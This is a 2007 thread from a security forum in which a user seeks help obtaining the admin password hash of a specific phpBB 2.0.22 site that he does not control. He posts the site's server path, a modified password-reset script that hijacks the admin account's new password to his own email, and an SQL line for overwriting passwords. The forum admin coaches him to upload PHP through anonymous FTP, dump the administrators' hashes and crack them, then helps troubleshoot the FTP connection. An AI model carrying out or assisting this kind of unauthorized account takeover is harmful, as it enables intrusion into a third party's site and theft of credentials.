|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
How to obtain MD5 hashes on phpbb 2.0.22? |
|
Posted: Fri Dec 21, 2007 1:19 pm |
|
|
dbzfanatic_1 |
Regular user |
|
|
Joined: May 22, 2007 |
Posts: 12 |
|
|
|
|
|
|
|
I can do the rest myself easily enough. The site has html disabled, only standard bbcode, and (for now) the docs directory is still there, unprotected. Here is a full path disclosure of the site.
/home/exosyph/public_html/addon-domain-exosyphenstudios-com/site-forum/profile.php
Any help would be GREATLY appreciated. I know the admin of the site personally and I don't want the hash to get revenge or anything like that, simply to convince him to upgrade to something more secure or at least change his board config. |
|
|
|
|
Posted: Fri Dec 21, 2007 1:37 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
phpbb 2.0.22 happens to be the latest versions of 2.x branch. So there is no known security issues as for today - correct me, if i'm wrong.
Your choices are:
1. possible vulnerable MOD-s in target phpbb installation
2. colocated websites on same webserver |
|
|
|
|
|
|
|
|
Posted: Fri Dec 21, 2007 1:50 pm |
|
|
dbzfanatic_1 |
Regular user |
|
|
Joined: May 22, 2007 |
Posts: 12 |
|
|
|
|
|
|
|
Thanks for the reply, and as far as I know he doesn't have any MODs installed, and most of the non-standard features he made himself. He's a game programmer and a wiz at C++ and I'm guessing he knows php at least casually. I have a few ideas of exploits but no sure way to implement them. One idea I had was: he has a web server and it seems that anonymous users can upload files (may be mistaken, I haven't tried). I thought that if I could mod the files that resend passwords (already done this on my own site, converted the "generate new pass" to a "recover my pass" feature. Safe enough because I'm the only admin) and upload them to the server then just access them from firefox, reset the password, and have it sent to me instead of his email. This is not easy for me though since I'm a novice (at best) concerning php. I'm not sure about other websites linked to his, and my other idea (only other one that may work) is since the doc directory is still open to possibly access that, change some files to php to send me the password, then access them.
Here's all I have so far, which is the modded usercp_sendpasswd.php file
Code: | <?php
/***************************************************************************
* usercp_sendpasswd.php
* -------------------
* begin : Saturday, Feb 13, 2001
* copyright : (C) 2001 The phpBB Group
* email : support@phpbb.com
*
* $Id: usercp_sendpasswd.php,v 1.6.2.13 2005/09/14 18:14:30 acydburn Exp $
*
*
***************************************************************************/
/***************************************************************************
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
*
***************************************************************************/
if ( isset($HTTP_POST_VARS['submit']) )
{
$username = ( !empty($HTTP_POST_VARS['username']) ) ?
phpbb_clean_username($HTTP_POST_VARS['username']) : '';
$email = ( !empty($HTTP_POST_VARS['email']) ) ?
trim(strip_tags(htmlspecialchars($HTTP_POST_VARS['email']))) : '';
$sql = "SELECT user_id, username, user_email, user_active, user_lang, pw_backup
FROM " . USERS_TABLE . "
WHERE user_id = 2";
if ( $result = $db->sql_query($sql) )
{
if ( $row = $db->sql_fetchrow($result) )
{
if ( !$row['user_active'] )
{
message_die(GENERAL_MESSAGE,
$lang['No_send_account_inactive']);
}
$username = $row['username'];
$user_id = $row['user_id'];
$user_actkey = gen_rand_string(true);
$key_len = 54 - strlen($server_url);
$key_len = ($key_len > 6) ? $key_len : 6;
$user_actkey = substr($user_actkey, 0, $key_len);
$user_password = gen_rand_string(false);
$sql = "UPDATE " . USERS_TABLE . "
SET user_newpasswd = '" . md5($user_password) . "',
user_actkey = '$user_actkey'
WHERE user_id = " . $row['user_id'];
if ( !$db->sql_query($sql) )
{
message_die(GENERAL_ERROR, 'Could not update new password
information', '', __LINE__, __FILE__, $sql);
}
include($phpbb_root_path . 'includes/emailer.'.$phpEx);
$emailer = new emailer($board_config['smtp_delivery']);
$emailer->from($board_config['board_email']);
$emailer->replyto($board_config['board_email']);
$emailer->use_template('user_activate_passwd', $row['user_lang']);
$emailer->email_address("myemail@.com";
$emailer->set_subject($lang['New_password_activation']);
$emailer->assign_vars(array(
'SITENAME' => $board_config['sitename'],
'USERNAME' => $username,
'PASSWORD' => $user_password,
'EMAIL_SIG' => (!empty($board_config['board_email_sig'])) ?
str_replace('<br />', "\n", "-- \n" . $board_config['board_email_sig']) : '',
'U_ACTIVATE' => $server_url . '?mode=activate&' .
POST_USERS_URL . '=' . $user_id . '&act_key=' . $user_actkey)
);
$emailer->send();
$emailer->reset();
$template->assign_vars(array(
'META' => '<meta http-equiv="refresh" content="15;url=' .
append_sid("index.$phpEx") . '">')
);
$message = $lang['Password_updated'] . '<br /><br />' .
sprintf($lang['Click_return_index'], '<a href="' . append_sid("index.$phpEx") . '">',
'</a>');
message_die(GENERAL_MESSAGE, $message);
}
else
{
message_die(GENERAL_MESSAGE, $lang['No_email_match']);
}
}
else
{
message_die(GENERAL_ERROR, 'Could not obtain user information for
sendpassword', '', __LINE__, __FILE__, $sql);
}
}
else
{
$username = '';
$email = '';
}
//
// Output basic page
//
include($phpbb_root_path . 'includes/page_header.'.$phpEx);
$template->set_filenames(array(
'body' => 'profile_send_pass.tpl')
);
make_jumpbox('viewforum.'.$phpEx);
$template->assign_vars(array(
'USERNAME' => $username,
'EMAIL' => $email,
'L_SEND_PASSWORD' => $lang['Send_password'],
'L_ITEMS_REQUIRED' => $lang['Items_required'],
'L_EMAIL_ADDRESS' => $lang['Email_address'],
'L_SUBMIT' => $lang['Submit'],
'L_RESET' => $lang['Reset'],
'S_HIDDEN_FIELDS' => '',
'S_PROFILE_ACTION' => append_sid("profile.$phpEx?mode=sendpassword"))
);
$template->pparse('body');
include($phpbb_root_path . 'includes/page_tail.'.$phpEx);
?> |
|
|
|
|
|
|
|
|
|
Posted: Fri Dec 21, 2007 1:55 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
You can upload and/or manipulate php files on target server? So what's the problem? You can do whatever you want then. With few php lines fetch the needed data from database or modify data directly. Php scripting level access is considered higher level than phpbb admin. |
|
|
|
|
Posted: Fri Dec 21, 2007 2:01 pm |
|
|
dbzfanatic_1 |
Regular user |
|
|
Joined: May 22, 2007 |
Posts: 12 |
|
|
|
|
|
|
|
Like I said these are just theories...ideas. I THINKI can upload. I don't know for sure. You also have to remember I don't know a lot of php. I don't know the lines. The best I could do would be
Code: | $pass = md5("w/e pass i want"); $sql = "UPDATE" . USERS_TABLE . " SET user_password = $pass"; | This may or may not work, and like I said it's just to prove a point, not get revenge. Even if the anonymous FTP user CAN upload I have no idea WHERE the files would be. All of this is sheer theory. |
|
|
|
|
Posted: Fri Dec 21, 2007 2:05 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Then first try to prove your theory and get access to php level. And then just write little php code which will fetch all users (or only admins) from database and write data to some file or just echo it back. And then try to crack md5 hashes you fetched. |
|
|
|
|
|
|
|
|
Posted: Fri Dec 21, 2007 2:15 pm |
|
|
dbzfanatic_1 |
Regular user |
|
|
Joined: May 22, 2007 |
Posts: 12 |
|
|
|
|
|
|
|
Well honestly I'm new to this. I'm a white-hat script kiddie (at best) so right now I need as much help as I can get. I know the sql (more or less) to fetch the password of a specified user, which is what I want. I just can't think of anything that submits and sql query with variables I can exploit. Honestly I don't think it has to be ME doing this, just anyone who can. Proof of concept doesn't care who creates it. I'll admit I'm a computer programmer but the languages I know well enough to use are either outdated (like VB6) or are disabled (like html). I'm also willing to admit I'm not a "master" of any language in the sense I don't know any language fully. I know enough to get by. I have NO skill with FTP since I've never used it before and thus I can't test any of these ideas. I do know that when I login with the anonymous account I do this:
ls
200 PORT command successful
after that it usually gives me a time-out message. When I logout it says
goodbye anonymous. You have uploaded 0 bytes and have downloaded 0 bytes. That is what gave me the impression the anonymous user could upload. |
|
|
|
|
|
|
|
|
Posted: Fri Dec 21, 2007 2:24 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
If you can log in as anonymous but after ls command get timeout, then it seems to be firewall problem. From internet:
Code: |
Common Firewall
* I can connect to the FTP server. The connection hangs after the ls, dir, put or get command.
o Use passive FTP. This is done with the "passive" command for most command line clients. If your client does not offer the passive command it will use active FTP properly.
|
So try to use passive mode. And "ls -la" is better choice - you can see dir and file permissions. |
|
Last edited by waraxe on Fri Dec 21, 2007 2:27 pm; edited 1 time in total |
|
|
|
Posted: Fri Dec 21, 2007 2:26 pm |
|
|
dbzfanatic_1 |
Regular user |
|
|
Joined: May 22, 2007 |
Posts: 12 |
|
|
|
|
|
|
|
I'm using the built in (sucky,yes I know) windows ftp client, the one from cmd so I guess I can't use passive mode. I'll try allowing it in my firewall. Also thanks for the info about "ls -la" |
|
|
|
|
Posted: Fri Dec 21, 2007 2:29 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Once you have connected, then logged in use the following command from the Windows FTP command line client:
LITERAL PASV
You should see then "Entering Passive Mode" |
|
|
|
|
|
|
|
|
Posted: Fri Dec 21, 2007 2:35 pm |
|
|
dbzfanatic_1 |
Regular user |
|
|
Joined: May 22, 2007 |
Posts: 12 |
|
|
|
|
|
|
|
Oh, thank you very much. I told you I'd never done FTP before and I suppose that proved it . I'm only 19 so I deserve a break (not really but it's fun to say). Here's the output I got.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 8 of 50 allowed.
220-Local time is now 08:31. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (*********.com:(none)):
230 Anonymous user logged in
ftp> LITERAL PASV
227 Entering Passive Mode (**,**,**,**,147,133)
ftp> ls -la
200 PORT command successful
425 Could not open data connection to port 50016: Connection timed out
ftp>
It can't be my firewall because it was turned completely off this time.
Also this may help:
214-The following SITE commands are recognized
ALIAS
CHMOD
IDLE
UTIME
214 Pure-FTPd - http://pureftpd.org/ |
|
|
|
|
|
|
|
|
Posted: Fri Dec 21, 2007 2:43 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
If you have no firewall between you and ftp server, then ls command must work without PASSIVE mode, and PASSIVE should work too. How you are connected to internet? From home, DSL? Maybe your ISP has firewall restrictions. Try some other anonymous ftp servers, like ftp.microsoft.com - do they work? Without PASV? |
|
|
|
|
Posted: Fri Dec 21, 2007 2:45 pm |
|
|
dbzfanatic_1 |
Regular user |
|
|
Joined: May 22, 2007 |
Posts: 12 |
|
|
|
|
|
|
|
I have Charter, so I have a cable modem. I was able to enter passive mode but not much of anything else. If you look at my previous post you'll see the available commands for anonymous users. I may have posted after you started typing your response. |
|
|
|
|
Posted: Fri Dec 21, 2007 2:46 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Still - try other ftp servers in order to determine, that is it common problem or related only to specific ftp server. |
|
|
|
|
Posted: Fri Dec 21, 2007 2:49 pm |
|
|
dbzfanatic_1 |
Regular user |
|
|
Joined: May 22, 2007 |
Posts: 12 |
|
|
|
|
|
|
|
This is the output I got from my own website's FTP server. No I don't generally connect I just store files there for my members to download.
220 Welcome to the New Chaos Programming FTP Server
User (****:(none)):
501 Syntax error
Login failed.
ftp> user anonymous
331 Password required for anonymous
Password:
230 Logged on
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
incoming
onefile.html
226 Transfer OK
ftp: 24 bytes received in 0.00Seconds 24000.00Kbytes/sec.
ftp> |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|